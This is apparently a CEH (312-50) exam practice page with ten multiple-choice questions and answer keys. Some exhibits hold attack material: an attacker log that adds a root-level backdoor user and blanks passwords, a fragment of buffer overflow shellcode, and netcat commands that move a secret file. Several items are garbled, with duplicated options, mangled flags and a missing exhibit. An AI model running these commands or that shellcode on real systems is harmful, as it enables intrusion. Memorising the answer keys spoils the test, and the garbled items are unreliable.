EC-COUNCIL 312-50 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-50 Online Questions & Answers

• Question 141:

  While footprinting a network, what port/service should you look for to attempt a zone transfer?

  A. 53 UDP
  B. 53 TCP
  C. 25 UDP
  D. 25 TCP
  E. 161 UDP
  F. 22 TCP
  G. 60 TCP
  B. 53 TCP

  ---

  IF TCP port 53 is detected, the opportunity to attempt a zone transfer is there.

• Question 142:

  After studying the following log entries, how many user IDs can you identify that the attacker has tampered with?

  1.

  mkdir -p /etc/X11/applnk/Internet/.etc

  2.

  mkdir -p /etc/X11/applnk/Internet/.etcpasswd

  3.

  touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd

  4.

  touch -acmr /etc /etc/X11/applnk/Internet/.etc

  5.

  passwd nobody -d

  6.

  /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash

  7.

  passwd dns -d

  8.

  touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd

  9.

  touch -acmr /etc/X11/applnk/Internet/.etc /etc

  A. IUSR_
  B. acmr, dns
  C. nobody, dns D. nobody, IUSR_
  C. nobody, dns D. nobody, IUSR_

  ---

  Passwd is the command used to modify a user password and it has been used together with the usernames nobody and dns.

• Question 143:

  E-mail tracking is a method to monitor and spy the delivered e-mails to the intended recipient.

  

  Select a feature, which you will NOT be able to accomplish with this probe?

  A. When the e-mail was received and read
  B. Send destructive e-mails
  C. GPS location and map of the recipient
  D. Time spent on reading the e-mails
  E. Whether or not the recipient visited any links sent to them
  F. Track PDF and other types of attachments
  G. Set messages to expire after specified time
  H. Remote control the User's E-mail client application and hijack the traffic
  H. Remote control the User's E-mail client application and hijack the traffic

• Question 144:

  Keystroke logging is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.

  

  How will you defend against hardware keyloggers when using public computers and Internet Kiosks? (Select 4 answers)

  A. Alternate between typing the login credentials and typing characters somewhere else in the focus window
  B. Type a wrong password first, later type the correct password on the login page defeating the keylogger recording
  C. Type a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter.
  D. The next key typed replaces selected text portion. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd".Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies"asdfsd"
  E. The next key typed replaces selected text portion. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd".Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies"asdfsd"
  A. Alternate between typing the login credentials and typing characters somewhere else in the focus window
  C. Type a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter.
  D. The next key typed replaces selected text portion. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd".Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies"asdfsd"
  E. The next key typed replaces selected text portion. E.g. if the password is "secret", one could type "s", then some dummy keys "asdfsd".Then these dummies could be selected with mouse, and next character from the password "e" is typed, which replaces the dummies"asdfsd"

• Question 145:

  Exhibit:

  

  Given the following extract from the snort log on a honeypot, what service is being exploited? :

  A. FTP
  B. SSH
  C. Telnet
  D. SMTP
  A. FTP

  ---

  The connection is done to 172.16.1.104:21.

• Question 146:

  Which of the following activities will not be considered passive footprinting?

  A. Go through the rubbish to find out any information that might have been discarded
  B. Search on financial site such as Yahoo Financial to identify assets
  C. Scan the range of IP address found in the target DNS database
  D. Perform multiples queries using a search engine
  C. Scan the range of IP address found in the target DNS database

  ---

  Scanning is not considered to be passive footprinting.

• Question 147:

  #define MAKE_STR_FROM_RET(x) ((x)and0xff), (((x)and0xff00)8), (((x)and0xff0000)16), (((x)and0xff000000)24) char infin_loop[]=

  /* for testing purposes */

  "\xEB\xFE";

  char bsdcode[] =

  /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */ "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43" "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80 \xeb\x77\x5e\x31\xc0" "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53

  \xb0" "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80" "\x31\xc0\x31\xdb \x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9" "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75" "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0

  \x3d \xcd" "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46" "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56" "\x0c\x52\x51\x53\x53\xb0\x3b\xcd \x80\x31\xc0\x31\xdb\x53" "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01

  \xff\xff\x30" "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e" "\x67\x6c\x69 \x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; static char *magic_str=NULL;

  int before_len=0;

  char *target=NULL, *username="user", *password=NULL;

  struct targets getit;

  The following exploit code is extracted from what kind of attack?

  A. Remote password cracking attack
  B. SQL Injection
  C. Distributed Denial of Service
  D. Cross Site Scripting
  E. Buffer Overflow
  E. Buffer Overflow

  ---

  This is a buffer overflow with it's payload in hex format.

• Question 148:

  SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. This protocol has long been used by hackers to gather great amount of information about remote hosts.

  Which of the following features makes this possible? (Choose two)

  A. It used TCP as the underlying protocol.
  B. It uses community string that is transmitted in clear text.
  C. It is susceptible to sniffing.
  D. It is used by all network devices on the market.
  B. It uses community string that is transmitted in clear text.
  C. It is susceptible to sniffing.

  ---

  Simple Network Management Protocol (SNMP) is a protocol which can be used by administrators to remotely manage a computer or network device. There are typically 2 modes of remote SNMP monitoring. These modes are roughly 'READ' and 'WRITE' (or PUBLIC and PRIVATE). If an attacker is able to guess a PUBLIC community string, they would be able to read SNMP data (depending on which MIBs are installed) from the remote device. This information might include system time, IP addresses, interfaces, processes running, etc. Version 1 of SNMP has been criticized for its poor security. Authentication of clients is performed only by a "community string", in effect a type of password, which is transmitted in cleartext.

• Question 149:

  An attacker runs netcat tool to transfer a secret file between two hosts.

  Machine A: netcat -1 p 1234 < secretfile

  Machine B: netcat 192.168.3.4 > 1234

  He is worried about information being sniffed on the network.

  How would the attacker use netcat to encrypt information before transmitting it on the wire?

  A. Machine A: netcat -1 p s password 1234 < testfileMachine B: netcat 1234
  B. Machine A: netcat -1 e magickey p 1234 < testfileMachine B: netcat 1234
  C. Machine A: netcat -1 p 1234 < testfile pw passwordMachine B: netcat 1234 pw password
  D. Use cryptcat instead of netcat.
  D. Use cryptcat instead of netcat.

  ---

  Cryptcat is the standard netcat enhanced with twofish encryption with ports for WIndows NT, BSD and Linux. Twofish is courtesy of counterpane, and cryptix. A default netcat installation does not contain any cryptography support.

• Question 150:

  Which of the following are potential attacks on cryptography? (Select 3)

  A. One-Time-Pad Attack
  B. Chosen-Ciphertext Attack
  C. Man-in-the-Middle Attack
  D. Known-Ciphertext Attack
  E. Replay Attack
  B. Chosen-Ciphertext Attack
  C. Man-in-the-Middle Attack
  E. Replay Attack

  ---

  A chosen-ciphertext attack (CCA) is an attack model for cryptanalysis in which the cryptanalyst chooses a ciphertext and causes it to be decrypted with an unknown key. Specific forms of this attack are sometimes termed "lunchtime" or "midnight" attacks, referring to a scenario in which an attacker gains access to an unattended decryption machine. In cryptography, a man-in-the-middle attack (MITM) is an attack in which an attacker is able to read, insert and modify at will, messages between two parties without either party knowing that the link between them has been compromised. The attacker must be able to observe and intercept messages going between the two victims. A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack).